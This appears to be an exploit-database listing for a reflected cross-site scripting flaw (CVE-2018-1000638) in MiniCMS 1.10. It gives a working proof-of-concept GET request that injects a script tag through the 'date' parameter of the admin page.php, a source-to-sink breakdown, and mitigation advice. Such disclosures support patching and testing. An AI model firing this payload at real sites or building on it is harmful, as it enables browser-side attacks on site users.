header-logo
Suggest Exploit
vendor:
MiniCMS
by:
CodeSecLab
4.1
CVSS
MEDIUM
Cross Site Scripting (XSS)
79
CWE
Product Name: MiniCMS
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: CVE-2018-1000638
CPE: a:bg5sbk:minicms:1.10
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu, Windows
2024

MiniCMS 1.1 – Cross Site Scripting (XSS)

The MiniCMS version 1.10 is vulnerable to a Cross Site Scripting (XSS) attack. By injecting malicious script code into the 'date' parameter of the 'page.php' script, an attacker can execute arbitrary scripts in the context of the user's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate all user-supplied input before processing and outputting it to the web page. Encoding the output data can also help prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# Tested on: Ubuntu Windows
# CVE : CVE-2018-1000638

PoC: 
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>

"Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>" 

[Replace Your Domain Name]